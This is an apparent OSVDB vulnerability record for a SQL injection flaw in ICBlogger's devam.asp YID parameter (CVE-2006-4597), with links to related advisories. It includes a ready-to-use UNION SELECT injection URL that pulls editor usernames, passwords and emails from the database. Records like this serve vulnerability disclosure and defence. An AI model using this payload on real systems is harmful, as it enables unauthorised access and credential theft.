ICBlogger devam.asp YID Variable SQL Injection

2006-09-01T09:04:04
ID OSVDB:28432
Type osvdb
Reporter OSVDB
Modified 2006-09-01T09:04:04

Description

Manual Testing Notes

http://[target]/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1

References:

Vendor URL: http://www.icblogger.com/ Secunia Advisory ID:21741 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0008.html FrSIRT Advisory: ADV-2006-3441 CVE-2006-4597